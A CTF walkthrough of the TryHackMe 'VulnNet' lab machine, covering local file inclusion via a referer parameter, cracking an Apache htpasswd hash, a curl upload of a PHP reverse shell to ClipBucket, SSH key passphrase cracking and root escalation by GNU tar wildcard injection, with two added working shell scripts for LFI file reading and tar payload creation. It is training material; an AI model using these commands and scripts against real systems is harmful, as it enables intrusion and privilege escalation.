{THM} VulnNet
Last updated
The purpose of this challenge is to make use of more realistic techniques and combine them in a single machine to practice your skills.
Difficulty: Medium
Web Language: PHP
You will have to add the machine IP with the domain vulnnet.thm to your /etc/hosts
Before we start, as mentioned in the introduction, we need to add this machine to our hosts file.
The port scan shows only 2 open ports. Let's move on!
The landing page looks normal, with nothing suspicious. But always remember to check the source code!
In the source code there is some odd JavaScript. To pull the endpoints out of it I used the tool LinkFinder.
We found another subdomain. At the moment my ffuf is not working (still figuring that out), so let's add the new subdomain to our hosts file.
Browsing the new subdomain prompts a Basic Authentication login screen. We do not have the credentials yet. However, the referer parameter in the URL can be abused as a local file inclusion (LFI): you can read /etc/passwd from the machine by running:
From here we find some juicy information, such as backups and the server-management user, that we can use in the next part.
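As an added example (not part of the original writeup), the following shell script pulls files through a referer-style LFI and triages the /etc/passwd output for accounts that have an interactive shell, which is exactly what tells you which home directories are worth visiting later. The endpoint URL and the parameter name are assumptions (adjust them to the real vulnerable page); the passwd lines are a constructed sample, with the user names taken from this writeup.

```sh
#!/bin/sh
# Added example: read files through a referer-parameter LFI and triage /etc/passwd.
# ASSUMPTION: the vulnerable page and parameter name below; override via environment.
LFI_URL="${LFI_URL:-http://vulnnet.thm/index.php}"
LFI_PARAM="${LFI_PARAM:-referer}"

# Fetch one absolute path from the target through the LFI (needs network access).
lfi_fetch() {
  curl -s -G "$LFI_URL" --data-urlencode "$LFI_PARAM=$1"
}

# Read passwd lines on stdin and print "name:home:shell" for every account whose
# shell is not a nologin/false stub; these are the users that can actually log in.
interactive_users() {
  awk -F: 'NF >= 7 && $7 !~ /(nologin|false)$/ { print $1 ":" $6 ":" $7 }'
}

# Constructed sample of what the LFI returns; not captured from the real machine.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
server-management:x:1000:1000:server-management:/home/server-management:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin'

# Offline demo on the sample: prints root and server-management only.
demo_triage() {
  printf '%s\n' "$SAMPLE_PASSWD" | interactive_users
}

# Live run against the target: sh lfi_triage.sh --live
if [ "${1:-}" = "--live" ]; then
  lfi_fetch /etc/passwd | interactive_users
fi
```

The same `lfi_fetch` is what you point at /etc/apache2/.htpasswd in the next step; the triage filter is kept separate so it can be reused on any passwd dump.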
Since we know this machine runs the Apache web server, the credentials may be stored in /etc/apache2/.htpasswd, and reading that file through the same LFI does give us credentials:
developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
This is an Apache MD5 hash (the $apr1$ prefix; hashcat mode 1600, john's md5crypt format). Let's crack it with our all-time favourite tool.
Yes! We have the username and password; let's enter them at the login prompt.
The title of the page shows ClipBucket v4.0, an open source OTT, VOD and enterprise video hosting solution. Using searchsploit, we identify a critical vulnerability: an unauthenticated arbitrary file upload. Note that "unauthenticated" refers to ClipBucket itself; the Basic Authentication in front of this vhost still applies, which is why the upload request below carries the developers credentials.
Let's prepare our payload, a PHP reverse shell, and use the upload command given in the ClipBucket cheatsheet:
curl -F "file=@php-reverse-shell.php" -F "plupload=1" -F "name=php-reverse-shell.php" http://broadcast.vulnnet.thm/actions/beats_uploader.php -u developers:<REDACTED>
How do I know where the file is uploaded? Just read and follow the given PoC. Once the upload reports success, browse to where the file lands and request it to execute it. Notice that the file name has been changed on upload. And always start your listener before executing the shell.
We have exploited this machine and have a shell as www-data.
Remember what we found earlier in /etc/passwd? Let's head to the backups directory first. But before that, always stabilise your shell, since this is a raw shell.
We find a lot of backup files here, and the most interesting is the SSH one. Let's copy it into /tmp, since we need to unzip it and copy out the contents. Then, on our own machine, we crack the id_rsa passphrase.
We use ssh2john to create the hash file and crack it with john. Before using the key, always set its permissions to 600.
Once we have cracked the passphrase, let's log in over SSH:
ssh -i id_rsa server-management@vulnnet.thm
We have access as server-management and can get the user flag.
Since we cannot check sudo permissions without the user's password, let's check the crontab.
There is a tar wildcard vulnerability. When tar is run with a shell wildcard, the shell expands the wildcard into the filenames in that directory, and GNU tar treats filenames that start with -- as options, so you can create files that make tar execute a command. Run the following commands to obtain access as the root user.
Wait for the script to run; in this case it is scheduled every 2 minutes.
We get the root flag.
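As an added example, not from the original writeup, the script below builds the filenames that turn a cron job's `tar ... *` into command execution and then simulates the cron job locally so you can watch the checkpoint action fire. It assumes GNU tar (the --checkpoint options are a GNU extension) and a writable temporary directory. On the target the payload files go in the directory the root cron job archives, and the command would be whatever gives you a root shell; here it only creates a marker file so the demo is harmless.

```sh
#!/bin/sh
# Added example (not from the original writeup): GNU tar wildcard injection.
# ASSUMPTIONS: GNU tar on PATH, writable mktemp directory.

# Drop three files into DIR that turn "tar -cf backup.tar *" into "sh shell.sh".
# The shell expands '*' to every filename in DIR, and GNU tar parses names that
# begin with "--" as options, so the two empty files land on tar's command line
# as --checkpoint=1 and --checkpoint-action=exec=sh shell.sh.
make_wildcard_payload() {
  dir="$1"   # directory the cron job archives with a wildcard
  cmd="$2"   # command to run as the cron job's user (root on the target)
  printf '#!/bin/sh\n%s\n' "$cmd" > "$dir/shell.sh"
  chmod +x "$dir/shell.sh"
  : > "$dir/--checkpoint=1"
  : > "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Stand-in for the cron job: same command shape, run as the current user.
# The cd matters: '*' must expand to bare names, with no path before the "--".
simulate_cron_backup() {
  src="$1"
  out="$2"
  (cd "$src" && tar -cf "$out" *) >/dev/null 2>&1
}

# Full demo: prints "executed" when the checkpoint action ran shell.sh.
demo_tar_wildcard() {
  work=$(mktemp -d)
  mkdir "$work/site"
  make_wildcard_payload "$work/site" "touch \"$work/marker\""
  simulate_cron_backup "$work/site" "$work/backup.tar"
  if [ -e "$work/marker" ]; then result=executed; else result=not-executed; fi
  rm -rf "$work"
  echo "$result"
}

# Run the demo: sh tar_wildcard.sh --demo
if [ "${1:-}" = "--demo" ]; then
  demo_tar_wildcard
fi
```

Because --checkpoint=1 fires on the very first record written, the archive does not need to be large; a directory with only shell.sh in it is enough, which is why the trick works against a two-minute backup job regardless of what it backs up.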
Figure out a new script to fuzz for hidden directories (LinkFinder) (needs more proof)
New escalation using tar